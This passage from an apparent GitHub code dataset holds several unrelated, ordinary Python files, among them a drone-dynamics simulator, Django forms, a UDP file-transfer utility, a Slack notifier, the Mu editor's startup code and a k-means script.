self._action_space = Box(low=-float(\"inf\"), high=float(\"inf\"), shape=(4,))\n self._parameter_space = Box(low=-float(\"inf\"), high=float(\"inf\"), shape=(8,))\n\n # target equilibrium\n self.initial = torch.tensor([initial], device=self.device)\n\n # radius of initial position\n self.initial_radius = torch.tensor([initial_radius, initial_radius, initial_radius], device=self.device)\n\n # Euler integration\n self.euler_time = euler_time\n self.discrete_time = discrete_time\n\n # physical constants\n self.g = 9.81\n self.rho = 900.\n self.rho_air = 1.225\n self.pi = np.pi\n\n self.c_b = 1.\n self.c_d = 1.\n\n self.parameters = torch.tensor([np.nan] * 8, device=self.device)\n\n def project_parameters(self):\n \"\"\" performs parameters projection \"\"\"\n for i, (min_val, max_val) in enumerate(self.get_feasible_set().values()):\n with torch.no_grad():\n val_proj = self.parameters[:, i].clamp(min_val, max_val)\n\n for b in range(self.parameters.shape[0]):\n nn.init.constant_(self.parameters[b, i], val_proj[b].item())\n\n def set_parameters(self, parameters):\n \"\"\" set the parameters to fixed values \"\"\"\n self.parameters = parameters\n\n def initial_state(self, number_trajectories):\n \"\"\" samples \"number_trajectories\" initial states from P_0\n returns a tensor of shape (\"number_trajectories\", |S|) \"\"\"\n xyz = 2 * torch.rand(number_trajectories, 3, device=self.device) * self.initial_radius - self.initial\n state_not_xyz = torch.zeros((number_trajectories, self.observation_space.shape[0] - 3), device=self.device)\n\n return torch.cat([state_not_xyz, xyz], dim=-1)\n\n @abstractmethod\n def reward(self, states, actions, disturbances):\n \"\"\" reward function rho(s_t, a_t, xi_t) -> r_t\"\"\"\n raise NotImplementedError\n\n def _distance_omega(self, states, actions, disturbances):\n omega_1, omega_2, omega_3, omega_4 = actions.split(1, dim=-1)\n _, _, _, _, omega_1n, omega_2n, omega_3n, omega_4n = self._get_system_parameters()\n distance_omega = ((omega_1 - omega_1n).pow(2) + (omega_2 - omega_2n).pow(2)\n + (omega_3 - omega_3n).pow(2) + (omega_4 - omega_4n).pow(2))\n\n return distance_omega\n\n def dynamics(self, states, actions, disturbances):\n \"\"\" dynamics f(s_t, a_t, xi_t) -> s_t+1 \"\"\"\n s_next = states\n\n for _ in range(math.ceil(self.discrete_time / self.euler_time)):\n # linear evolution\n s_next = s_next + self._derivative(s_next, actions, disturbances) * self.euler_time\n\n # Euler angles are bounded (with a circular evolution)\n phi, theta, psi, p, q, r, u, v, w, x, y, z = s_next.split(1, dim=-1)\n\n # phi \\in ] -pi, pi]\n phi = self.circular_bound(phi, self.pi)\n\n # theta \\in ] -pi/2, pi/2]\n # theta = self.circular_bound(theta, self.pi)\n\n # phi \\in ] -pi, pi]\n psi = self.circular_bound(psi, self.pi)\n\n s_next = torch.cat([phi, theta, psi, p, q, r, u, v, w, x, y, z], dim=-1)\n\n return s_next\n\n def _derivative(self, states, actions, disturbances):\n \"\"\" computes the derivative of the state variables with the transition model \"\"\"\n # get the inertia and the mass\n i_x, i_y, i_z = self._get_inertia()\n m = self._get_mass()\n\n # get the motor forces on the system\n f_t, tau_x, tau_y, tau_z = self._get_motor_forces(actions)\n\n # get the state components\n phi, theta, psi, p, q, r, u, v, w, x, y, z = states.split(1, dim=-1)\n\n # get the wind disturbances and put the forces to the local frame\n glob_f_wx, glob_f_wy, glob_f_wz, tau_wx, tau_wy, tau_wz = (self.disturbance_to_force(states,\n actions,\n disturbances)\n .split(1, dim=-1))\n\n f_wx = 
((torch.cos(theta) * torch.cos(psi)) * glob_f_wx\n + (torch.cos(theta) * torch.sin(psi)) * glob_f_wy\n - torch.sin(psi) * glob_f_wz)\n f_wy = ((torch.sin(phi) * torch.sin(theta) * torch.cos(psi) - torch.cos(phi) * torch.sin(psi)) * glob_f_wx\n + (torch.sin(phi) * torch.sin(theta) * torch.sin(psi) + torch.cos(phi) * torch.cos(psi)) * glob_f_wy\n + torch.sin(phi) * torch.cos(theta) * glob_f_wz)\n f_wz = ((torch.cos(phi) * torch.sin(theta) * torch.cos(psi) + torch.sin(phi) * torch.sin(psi)) * glob_f_wx\n + (torch.cos(phi) * torch.sin(theta) * torch.sin(psi) - torch.sin(phi) * torch.cos(psi)) * glob_f_wy\n + torch.cos(phi) * torch.cos(theta) * glob_f_wz)\n\n # compute the state derivative with newton's formula and the change of coordinates\n dot_p = (i_y - i_z) / i_x * r * q + (tau_x + tau_wx) / i_x\n dot_q = (i_z - i_x) / i_y * p * r + (tau_y + tau_wy) / i_y\n dot_r = (i_x - i_y) / i_z * p * q + (tau_z + tau_wz) / i_z\n\n dot_u = r * v - q * w - self.g * torch.sin(theta) + f_wx / m\n dot_v = p * w - r * u + self.g * torch.sin(phi) * torch.cos(theta) + f_wy / m\n dot_w = q * u - p * v + self.g * torch.cos(phi) * torch.cos(theta) + (f_wz - f_t) / m\n\n dot_x = ((torch.cos(theta) * torch.cos(psi)) * u\n + (torch.sin(phi) * torch.sin(theta) * torch.cos(psi) - torch.cos(phi) * torch.sin(psi)) * v\n + (torch.cos(phi) * torch.sin(theta) * torch.cos(psi) + torch.sin(phi) * torch.sin(psi)) * w)\n dot_y = ((torch.cos(theta) * torch.sin(psi)) * u\n + (torch.sin(phi) * torch.sin(theta) * torch.sin(psi) + torch.cos(phi) * torch.cos(psi)) * v\n + (torch.cos(phi) * torch.sin(theta) * torch.sin(psi) - torch.sin(phi) * torch.cos(psi)) * w)\n dot_z = (-torch.sin(psi) * u\n + torch.sin(phi) * torch.cos(theta) * v\n + torch.cos(phi) * torch.cos(theta) * w)\n\n dot_phi = p + torch.sin(phi) * torch.tan(theta) * q + torch.cos(phi) * torch.tan(theta) * r\n dot_theta = torch.cos(phi) * q - torch.sin(phi) * r\n dot_psi = (torch.sin(phi) / torch.cos(theta)) * q + (torch.cos(phi) / torch.cos(theta)) * r\n\n return torch.cat([dot_phi, dot_theta, dot_psi, dot_p, dot_q, dot_r, dot_u, dot_v, dot_w, dot_x, dot_y, dot_z],\n dim=-1)\n\n def _get_inertia(self):\n l, r_b, t, w, _, _, _, _ = self._get_system_parameters()\n\n i_x = (1 / 6.) * self.rho * l * t * (4 * l**2 + t**2)\n i_y = i_x.clone()\n i_z = (1 / 3.) * self.rho * l * w * (4 * l**2 + w**2) - (1 / 6.) 
* self.rho * w**4\n\n return i_x, i_y, i_z\n\n def _get_mass(self):\n l, r_b, t, w, _, _, _, _ = self._get_system_parameters()\n m = self.rho * t * w * (2 * (2 * l - w) + w)\n\n return m\n\n def _get_motor_forces(self, actions):\n # thrust (b) and drag (d) factors\n b, d = self._get_thrust_drag_factors()\n\n # get l\n l, _, _, _, _, _, _, _ = self._get_system_parameters()\n\n # actions correspond to the angular speeds of the rotors\n omega_1, omega_2, omega_3, omega_4 = actions.split(1, dim=-1)\n\n # force from the speed\n f_t = b * (omega_1**2 + omega_2**2 + omega_3**2 + omega_4**2)\n\n # torques from the speed\n tau_x = b * l * (omega_3**2 - omega_1**2)\n tau_y = b * l * (omega_4**2 - omega_2**2)\n tau_z = d * (omega_2**2 + omega_4**2 - omega_1**2 - omega_3**2)\n\n return f_t, tau_x, tau_y, tau_z\n\n def _get_thrust_drag_factors(self):\n # thrust (b) and drag (d) factors\n _, r_b, _, _, _, _, _, _ = self._get_system_parameters()\n area = self.pi * r_b**2\n b = 0.5 * self.rho_air * self.c_b * area * r_b**2\n d = 0.5 * self.rho_air * self.c_d * area * r_b**2\n\n return b, d\n\n def _get_system_parameters(self):\n phi_0, phi_1, phi_2, phi_3, omega_1, omega_2, omega_3, omega_4 = self.parameters.split(1, dim=-1)\n l, r_b, t, w = phi_0 + phi_1, phi_1, phi_2, phi_3\n\n return l, r_b, t, w, omega_1, omega_2, omega_3, omega_4\n\n @staticmethod\n def circular_bound(val, bound):\n # sign depends on how many circle were performed\n odd_overflow = (torch.floor(val / bound) - (val < 0.).float()).fmod(2)\n\n return val.fmod(bound) - odd_overflow * bound\n\n @abstractmethod\n def disturbance(self, states, actions):\n \"\"\" disturbance distribution P_xi(.|s_t, a_t)\n returns a torch.distribution object \"\"\"\n raise NotImplementedError\n\n def disturbance_to_force(self, states, actions, dist):\n \"\"\" transforms a disturbance into a force and a torque applied on the drone \"\"\"\n return dist\n\n @abstractmethod\n def render(self, states, actions, dist, rewards, num_trj):\n raise NotImplementedError\n\n @abstractmethod\n def control_perf(self, states, actions, disturbances, rewards):\n raise NotImplementedError\n\n def parameters_dict(self):\n \"\"\" returns a dictionary mapping the parameters\" name to their values \"\"\"\n return {name: self.get_parameters()[:, i].mean().item() for i, name in enumerate(self.get_feasible_set())}\n\n def get_feasible_set(self):\n \"\"\" returns the set of feasible values \"\"\"\n return {\"arm\": self.feasible_set[\"arm\"],\n \"radius\": self.feasible_set[\"radius\"],\n \"thickness\": self.feasible_set[\"thickness\"],\n \"width\": self.feasible_set[\"width\"],\n **{f\"speed-{i}\": self.feasible_set[\"speed\"] for i in range(self.parameter_space.shape[0] - 4)}}\n\n def get_parameters(self):\n \"\"\" returns the parameter vector \"\"\"\n return self.parameters\n\n def to_gym(self):\n \"\"\" builds a gym environment \"\"\"\n raise NotImplementedError\n","repo_name":"adrienBolland/Jointly-Learning-Environments-and-Control-Policies-with-Projected-Stochastic-Gradient-Ascent","sub_path":"system/Drone/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":10627,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"37384103146","text":"from django import forms\nfrom django.forms import Select, ModelForm\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom .models import Kills\nimport pandas as pd\n\nclass Registration(UserCreationForm):\n\n email = 
forms.EmailField(label='Your email')\n\n def __init__(self, *args, **kwargs):\n super(UserCreationForm, self).__init__(*args, **kwargs)\n\n for fieldname in ['username', 'password1', 'password2']:\n self.fields[fieldname].help_text = None\n\n class Meta:\n model = User\n fields = (\"username\", \"email\") # No password field needed\n\n def save_user(self, commit=True):\n user = super(Registration, self).save(commit=False)\n user.email = self.cleaned_data['email']\n if commit:\n user.save()\n return user\n\nclass MvpKill(forms.Form):\n\n model = Kills\n fields = (\"name\", \"quantity\")\n CHOICES = []\n listmvp = pd.read_csv('RagnarokDatabase/static/Lista MVP.csv')\n \n for row in listmvp.itertuples():\n CHOICES.append(row)\n \n name = forms.ChoiceField(choices=CHOICES)\n quantity = forms.IntegerField(required=False, initial=1)\n owner=\"\"\n\nclass LoginForm(forms.Form):\n email = forms.EmailField(label='Your email')\n\n class Meta:\n model = User\n fields = (\"username\", \"email\")\n","repo_name":"RomeroRodriguezD/RagnarokMVPKillsDatabase","sub_path":"RagnarokDatabase/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"20821114275","text":"import os\nimport socket\nimport sys\nimport time\n\ndef receive(client_socket, cmd, fpath, buffer_size=1024):\n receiver_ip = socket.gethostbyname(socket.getfqdn())\n print(\"ready for receive... \")\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \n sock.bind((receiver_ip, 0))\n receiver_port = sock.getsockname()[1]\n print(receiver_port)\n cmd = cmd + \" \" +receiver_ip+\" \"+str(receiver_port)\n receiver_port = int(receiver_port)\n client_socket.send(cmd.encode('utf-8'))\n try:\n filesize, addr = sock.recvfrom(buffer_size)\n filesize = filesize.decode()\n print(\"File Size: \", filesize)\n size = 0\n remain= int(filesize)\n start_time = time.time()\n with open(fpath, \"w\") as f:\n while True:\n if remain >= buffer_size:\n fileInfo , addr = sock.recvfrom(buffer_size)\n fileInfo = fileInfo.decode()\n f.write(fileInfo)\n remain -=buffer_size\n size += buffer_size\n print(size ,\"/\", filesize ,\" (currentsize/totalsize) ,\", round((100.00 *size/int(filesize)),2) ,\"%\")\n else:\n fileInfo , addr = sock.recvfrom(remain)\n fileInfo = fileInfo.decode()\n f.write(fileInfo)\n size+=remain\n print(size ,\"/\", filesize ,\" (currentsize/totalsize) ,\", round((100.00 *size/int(filesize)),2) ,\"%\")\n print(\"Completed ....\")\n break\n end_time = time.time()\n print(\"Time elapsed : \", end_time - start_time)\n except socket.error as e:\n print(e)\n sys.exit()\n\ndef send(receiver_ip, receiver_port, fpath, buffer_size=1024):\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #UDP\n sock.settimeout(10)\n size = 0\n filesize = os.path.getsize(fpath) \n remain = filesize\n receiver_port = int(receiver_port)\n print(\"FileSize : \", filesize)\n sock.sendto(str(filesize).encode(),(receiver_ip, receiver_port))\n time.sleep(1/10.0)\n start_time = time.time()\n try:\n with open(fpath, 'rb') as f:\n while True:\n if remain >= buffer_size:\n remain -=buffer_size\n read_data = f.read(buffer_size)\n size += buffer_size\n print(size , \"/\",filesize , \"(Currentsize/Totalsize) , \", round((100.00 * size/int(filesize)),2), \"%\")\n sock.sendto(read_data,(receiver_ip, receiver_port))\n time.sleep(1/10.0)\n else:\n size+=remain\n read_data = f.read(remain)\n print(size , \"/\",filesize , \"(Currentsize/Totalsize) , \", 
round((100.00 * size/int(filesize)),2), \"%\")\n sock.sendto(read_data, (receiver_ip, receiver_port))\n time.sleep(1/10.0)\n print(\"Completed ...\")\n break\n\n end_time = time.time()\n print(\"Time elapsed : \", end_time - start_time)\n except socket.error as e:\n print(e)\n sys.exit()\n","repo_name":"sh92/mfdfs","sub_path":"client/uftp/uftp.py","file_name":"uftp.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21373376477","text":"import slack\nimport sys\nimport threading\nfrom functools import wraps\n\ndefault_channel = 'sketch-transformer'\n\n\nclass Notifyier(object):\n\n def __init__(self, config_file=None):\n self.dummy = config_file is None or config_file == ''\n if not self.dummy:\n with open(config_file) as f:\n self.token = f.readline().strip()\n self.channel = f.readline().strip()\n self.slack_threads = {}\n\n def send_if_not_dummy(send):\n @wraps(send)\n def wrapper(inst, *args, **kwargs):\n if inst.dummy:\n print(\"[Notification] Not sent because there is no token\")\n return\n else:\n send(inst, *args, **kwargs)\n return wrapper\n\n def _send_initial_message(self, sc, experiment_id):\n \"\"\"Starts the thread on slack by sending the initial message with the\n command line arguments and experiment ID\n \"\"\"\n message = \"*[{}]*\\n`python {}`\".format(experiment_id, ' '.join(sys.argv))\n response = sc.chat_postMessage(\n channel=self.channel,\n text=message,\n as_user=True\n )\n self.slack_threads[experiment_id] = response[\"ts\"]\n\n @send_if_not_dummy\n def notify_with_message(self, message, experiment_id, send_to_channel=False):\n \"\"\"Sends a message to the thread associated with this experiment_id\n \"\"\"\n try:\n sc = slack.WebClient(self.token)\n if self.slack_threads.get(experiment_id) is None:\n self._send_initial_message(sc, experiment_id)\n sc.chat_postMessage(\n channel=self.channel,\n text=message,\n thread_ts=self.slack_threads[experiment_id],\n reply_broadcast=send_to_channel,\n as_user=True\n )\n except Exception as e:\n print(repr(e))\n\n def _notify_with_image(self, imagepath, experiment_id, message):\n try:\n sc = slack.WebClient(self.token)\n sc.files_upload(title=message,\n channels=self.channel,\n thread_ts=self.slack_threads[experiment_id],\n file=imagepath)\n except Exception as e:\n print(repr(e))\n\n @send_if_not_dummy\n def notify_with_image(self, imagepath, experiment_id, message=None):\n \"\"\"Sends an image to the thread associated with this experiment_id\n \"\"\"\n try:\n if message is None:\n message = imagepath\n if self.slack_threads.get(experiment_id) is None:\n sc = slack.WebClient(self.token)\n self._send_initial_message(sc, experiment_id)\n os_thread = threading.Thread(target=self._notify_with_image,\n args=(imagepath, experiment_id, message))\n os_thread.start()\n except Exception as e:\n print(repr(e))\n","repo_name":"leosampaio/sketchformer","sub_path":"core/notifyier.py","file_name":"notifyier.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"9489118053","text":"import logging\nfrom logging.handlers import TimedRotatingFileHandler\nimport os\nimport platform\nimport sys\n\nfrom PyQt5.QtCore import QTimer, Qt, QCoreApplication\nfrom PyQt5.QtWidgets import QApplication, QSplashScreen\n\nfrom . import i18n\nfrom .virtual_environment import venv\nfrom . 
import __version__\nfrom .logic import Editor, LOG_FILE, LOG_DIR, ENCODING\nfrom .interface import Window\nfrom .resources import load_pixmap, load_icon\nfrom .modes import (\n PythonMode,\n CircuitPythonMode,\n MicrobitMode,\n DebugMode,\n PyGameZeroMode,\n ESPMode,\n WebMode,\n PyboardMode,\n)\nfrom .interface.themes import NIGHT_STYLE, DAY_STYLE, CONTRAST_STYLE\nfrom . import settings\n\n\ndef excepthook(*exc_args):\n \"\"\"\n Log exception and exit cleanly.\n \"\"\"\n logging.error(\"Unrecoverable error\", exc_info=(exc_args))\n sys.__excepthook__(*exc_args)\n sys.exit(1)\n\n\ndef setup_logging():\n \"\"\"\n Configure logging.\n \"\"\"\n if not os.path.exists(LOG_DIR):\n os.makedirs(LOG_DIR)\n\n # set logging format\n log_fmt = (\n \"%(asctime)s - %(name)s:%(lineno)d(%(funcName)s) \"\n \"%(levelname)s: %(message)s\"\n )\n formatter = logging.Formatter(log_fmt)\n\n # define log handlers such as for rotating log files\n handler = TimedRotatingFileHandler(\n LOG_FILE, when=\"midnight\", backupCount=5, delay=0, encoding=ENCODING\n )\n handler.setFormatter(formatter)\n handler.setLevel(logging.DEBUG)\n\n # set up primary log\n log = logging.getLogger()\n log.setLevel(logging.DEBUG)\n log.addHandler(handler)\n sys.excepthook = excepthook\n\n\ndef setup_modes(editor, view):\n \"\"\"\n Create a simple dictionary to hold instances of the available modes.\n\n *PREMATURE OPTIMIZATION ALERT* This may become more complex in future so\n splitting things out here to contain the mess. ;-)\n \"\"\"\n return {\n \"python\": PythonMode(editor, view),\n \"circuitpython\": CircuitPythonMode(editor, view),\n \"microbit\": MicrobitMode(editor, view),\n \"esp\": ESPMode(editor, view),\n \"web\": WebMode(editor, view),\n \"pyboard\": PyboardMode(editor, view),\n \"debugger\": DebugMode(editor, view),\n \"pygamezero\": PyGameZeroMode(editor, view),\n }\n\n\ndef run():\n \"\"\"\n Creates all the top-level assets for the application, sets things up and\n then runs the application. 
Specific tasks include:\n\n - set up logging\n - create an application object\n - create an editor window and status bar\n - display a splash screen while starting\n - close the splash screen after startup timer ends\n \"\"\"\n setup_logging()\n logging.info(\"\\n\\n-----------------\\n\\nStarting Mu {}\".format(__version__))\n logging.info(platform.uname())\n logging.info(\"Python path: {}\".format(sys.path))\n logging.info(\"Language code: {}\".format(i18n.language_code))\n\n #\n # Load settings from known locations and register them for\n # autosave\n #\n settings.init()\n\n # Images (such as toolbar icons) aren't scaled nicely on retina/4k displays\n # unless this flag is set\n os.environ[\"QT_AUTO_SCREEN_SCALE_FACTOR\"] = \"1\"\n if hasattr(Qt, \"AA_EnableHighDpiScaling\"):\n QApplication.setAttribute(Qt.AA_EnableHighDpiScaling)\n QApplication.setAttribute(Qt.AA_UseHighDpiPixmaps)\n\n # An issue in PyQt5 v5.13.2 to v5.15.1 makes PyQt5 application\n # hang on Mac OS 11 (Big Sur)\n # Setting this environment variable fixes the problem.\n # See issue #1147 for more information\n os.environ[\"QT_MAC_WANTS_LAYER\"] = \"1\"\n\n # The app object is the application running on your computer.\n app = QApplication(sys.argv)\n # By default PyQt uses the script name (run.py)\n app.setApplicationName(\"mu\")\n # Set hint as to the .desktop files name\n app.setDesktopFileName(\"mu.codewith.editor\")\n app.setApplicationVersion(__version__)\n app.setAttribute(Qt.AA_DontShowIconsInMenus)\n\n #\n # FIXME -- look at the possiblity of tying ensure completion\n # into Splash screen finish below...\n #\n venv.ensure()\n\n # Create the \"window\" we'll be looking at.\n editor_window = Window()\n\n @editor_window.load_theme.connect\n def load_theme(theme):\n if theme == \"contrast\":\n app.setStyleSheet(CONTRAST_STYLE)\n elif theme == \"night\":\n app.setStyleSheet(NIGHT_STYLE)\n else:\n app.setStyleSheet(DAY_STYLE)\n\n # Display a friendly \"splash\" icon.\n splash = QSplashScreen(load_pixmap(\"splash-screen\"))\n splash.show()\n\n def raise_and_process_events():\n # Make sure the splash screen stays on top while\n # the mode selection dialog might open\n splash.raise_()\n\n # Make sure splash screen reacts to mouse clicks, even when\n # the event loop is not yet started\n QCoreApplication.processEvents()\n\n raise_splash = QTimer()\n raise_splash.timeout.connect(raise_and_process_events)\n raise_splash.start(10)\n\n # Hide the splash icon.\n def remove_splash():\n splash.finish(editor_window)\n raise_splash.stop()\n\n splash_be_gone = QTimer()\n splash_be_gone.timeout.connect(remove_splash)\n splash_be_gone.setSingleShot(True)\n splash_be_gone.start(2000)\n\n # Make sure all windows have the Mu icon as a fallback\n app.setWindowIcon(load_icon(editor_window.icon))\n # Create the \"editor\" that'll control the \"window\".\n editor = Editor(view=editor_window)\n editor.setup(setup_modes(editor, editor_window))\n # Setup the window.\n editor_window.closeEvent = editor.quit\n editor_window.setup(editor.debug_toggle_breakpoint, editor.theme)\n # Connect the various UI elements in the window to the editor.\n editor_window.connect_tab_rename(editor.rename_tab, \"Ctrl+Shift+S\")\n editor_window.connect_find_replace(editor.find_replace, \"Ctrl+F\")\n # Connect find again both forward and backward ('Shift+F3')\n find_again_handlers = (editor.find_again, editor.find_again_backward)\n editor_window.connect_find_again(find_again_handlers, \"F3\")\n editor_window.connect_toggle_comments(editor.toggle_comments, 
\"Ctrl+K\")\n editor.connect_to_status_bar(editor_window.status_bar)\n\n # Restore the previous session along with files passed by the os\n editor.restore_session(sys.argv[1:])\n\n # Stop the program after the application finishes executing.\n sys.exit(app.exec_())\n","repo_name":"magnetsrev/mu","sub_path":"mu/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"41427216272","text":"#!/usr/bin/env python3\n\nimport signal\nimport os\n\nimport i3ipc\n\nfocusHistory = {} # Indexed by workspace, contains pairs (prev, current)\ni3 = None\npidFile = os.path.join(os.environ[\"HOME\"], \".config\", \"i3\", \"alttab.pid\")\n\ndef focusWindowEvent(my_i3, e):\n global focusHistory\n global i3\n windowId = e.container.id\n if e.container.floating == \"user_on\" or e.container.floating == \"auto_on\":\n return\n try:\n workspace = i3.get_tree().find_by_id(windowId).workspace().name\n except AttributeError:\n return\n hist = focusHistory.get(workspace)\n if hist:\n histCurrent = hist[1]\n if windowId != histCurrent:\n focusHistory[workspace] = (histCurrent, windowId)\n else:\n focusHistory[workspace] = (None, windowId)\n\ndef focusWindow(signalnum, handler):\n global i3\n global focusHistory\n\n workspace = i3.get_tree().find_focused().workspace().name\n hist = focusHistory.get(workspace)\n if hist is not None:\n prev = hist[0]\n if prev is not None:\n target_window = i3.get_tree().find_by_id(prev)\n if target_window:\n target_window.command(\"focus\")\n\ndef main():\n global i3\n\n myPid = os.getpid()\n with open(pidFile, \"w\") as fp:\n print(myPid, file=fp)\n print(myPid)\n\n i3 = i3ipc.Connection()\n i3.on(\"window::focus\", focusWindowEvent)\n signal.signal(signal.SIGUSR1, focusWindow)\n\n i3.main()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"davvil/dotfiles","sub_path":".config/i3/alttab.py","file_name":"alttab.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21926612639","text":"import os\nfrom dataclasses import dataclass\n\nimport yaml\n\n\n@dataclass\nclass Config:\n aws_access_key_id: str\n aws_secret_access_key: str\n region_name: str\n endpoint_url: str\n table_name: str\n\n\n# read conf/configuration.yaml\nwith open(\"conf/configuration.yaml\", \"r\") as stream:\n try:\n configuration_yaml = yaml.safe_load(stream)\n except yaml.YAMLError as ex:\n print(ex)\n raise ex\n\nconfig = Config(\n # secrets from environment variables\n aws_access_key_id=os.getenv('aws_access_key_id', 'FAKE_ACCESS_KEY'),\n aws_secret_access_key=os.getenv('aws_secret_access_key', 'FAKE_SECRET_KEY'),\n\n # read configuration parameters\n region_name=configuration_yaml['aws']['region_name'],\n endpoint_url=configuration_yaml['aws']['dynamodb']['endpoint_url'],\n table_name=configuration_yaml['highscore']['table_name'],\n)\n","repo_name":"torbenmoeller/highscore","sub_path":"app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39757215766","text":"#!/bin/env python3\n\n\nN = 20201227\np, q = [int(x) for x in open('input.txt').readlines()]\n#print(p, q, N)\n\n\ndef brute_force(p, N):\n i = 1\n mul = 1\n while (mul * 7) % N != p:\n i += 1\n mul = (mul*7) % N\n return i\n\n\nx = brute_force(p, N)\ny = brute_force(q, N)\nres = 1\nfor i in range(y):\n res 
= (res*p) % N\nprint(res)\n\n","repo_name":"matusjokay/adventofcode","sub_path":"2020/25/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37218689841","text":"class Solution:\n def minSubsequence(self, nums: 'List[int]') -> 'List[int]':\n s = sum(nums)\n stk = []\n lst = sorted(nums)\n curr = 0\n while lst and curr <= s: #take out the largest number from the array, until the curr is > than the s\n stk.append(lst.pop())\n curr += stk[-1]\n s-=stk[-1]\n return stk","repo_name":"renjieliu/leetcode","sub_path":"1001_1499/1403.py","file_name":"1403.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"28002273717","text":"import uuid\n\nfrom invenio_db import db\nfrom sqlalchemy.dialects import postgresql\nfrom sqlalchemy_utils.models import Timestamp\nfrom sqlalchemy_utils.types import JSONType, UUIDType\n\n\nclass RecordMetadata(db.Model, Timestamp):\n \"\"\"Represent a record metadata inside the SQL database.\n\n Additionally it contains two columns ``created`` and ``updated``\n with automatically managed timestamps.\n \"\"\"\n\n # Enables SQLAlchemy-Continuum versioning\n __versioned__ = {}\n\n __tablename__ = 'records_metadata'\n\n id = db.Column(\n UUIDType,\n primary_key=True,\n default=uuid.uuid4,\n )\n \"\"\"Record identifier.\"\"\"\n\n json = db.Column(\n JSONType().with_variant(\n postgresql.JSON(none_as_null=True),\n 'postgresql',\n ),\n default=lambda: dict(),\n nullable=True\n )\n \"\"\"Store metadata in JSON format.\n\n When you create new ``Record`` the ``json`` field value should\n never be ``NULL``. Default value is an empty dict. 
``NULL``\n    value means that the record metadata has been deleted.\n    \"\"\"\n\n    version_id = db.Column(db.Integer, nullable=False)\n    \"\"\"It is used by SQLAlchemy for optimistic concurrency control.\"\"\"\n\n    __mapper_args__ = {\n        'version_id_col': version_id\n    }\n\n\n__all__ = (\n    'RecordMetadata',\n)\n","repo_name":"N03/invenio","sub_path":".virtualenvs/invenio/lib/python2.7/site-packages/invenio_records/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"4773736269","text":"import matplotlib.pyplot as plt\nfrom config import *\nimport numpy as np\nimport pandas as pd\n\n# Plotting settings\nplt.rcParams[\"font.sans-serif\"] = [\"SimHei\"] # set the font\nplt.rcParams[\"axes.unicode_minus\"] = False # this line fixes the garbled \"-\" (minus) sign in figures\n\n\n\n\ndef data_preprocess(file_path: str) -> tuple[pd.DataFrame, pd.DataFrame, int]:\n    \"\"\"\n    Data preprocessing\n    :param file_path: path to the data file\n    :return: labels, feature data and dataset length\n    \"\"\"\n    # Class 1: 59\n    # Class 2: 71\n    # Class 3: 48\n    # Read the data (13 features)\n    data = pd.read_csv(os.path.join(data_dir, file_path), header=None)\n    # Data normalization\n    # data = (data - data.min()) / (data.max() - data.min())\n    print(data.head())\n    # Drop the class label column (column 0)\n    return data[0], data.drop([0], axis=1), len(data)\n    # return data[0], data, len(data)\n\ndef cal_sse(mat: np.mat, length: int, k: int = 3) -> float:\n    \"\"\"\n    Compute the SSE\n    :param mat: data matrix\n    :param length: dataset length\n    :param k: number of cluster centers\n    :return: sse\n    \"\"\"\n    sse_num = np.zeros(3)\n    sse = 0\n    for i in range(length):\n        type = int(mat[i, 1]) - 1\n        sse_num[type] += mat[i, 0]\n    sse += sum(sse_num)\n    print(\"All sse: \", sse)\n    return sse\n\n\ndef gen_rand_ceter(data: pd.DataFrame, length: int, k: int = 3) -> np.ndarray:\n    \"\"\"\n    Generate random cluster centers\n    :param data: dataset\n    :param length: dataset length\n    :return: cluster centers\n    \"\"\"\n    data_list = data.to_numpy()\n    rand_ceter = np.zeros((k, data.shape[1]))\n    # Generate cluster centers fully at random\n    # for j in range(data.shape[1]):\n    #     rand_ceter[:, j] = np.random.rand(k)\n    # Generate cluster centers within a narrower range\n    for j in range(data.shape[1]):\n        # Get the min and max of each column\n        ran = float(max(data_list[:, j]) - min(data_list[:, j]))\n        # Sample random centers within the column's value range\n        rand_ceter[:, j] = min(data_list[:, j]) + ran * np.random.rand(k)\n    return rand_ceter\n\n\ndef gen_acc(mat: np.mat, length: int, k: int = 3) -> float:\n    \"\"\"\n    Compute the accuracy\n    :param mat: data matrix\n    :param length: dataset length\n    :param k: number of cluster centers\n    :return: accuracy\n    \"\"\"\n    acc = 0\n    for i in range(length):\n        if mat[i, 1] == mat[i, 2]:\n            acc += 1\n    print(\"acc: \", acc / length)\n    return acc / length\n\n\nif __name__ == \"__main__\":\n    label,data, length = data_preprocess(\"归一化数据.csv\")\n    # Initialize the number of cluster centers\n    k = cluster_num\n    # Initialize the maximum number of iterations\n    iter_num = max_iter\n    # Matrix: column 0 stores the Euclidean distance, column 1 the assigned cluster, column 2 the true class\n    mat = np.mat(np.zeros((length, 3)))\n    # Initialize the true classes\n    for i in range(length):\n        if i < 59:\n            mat[i, 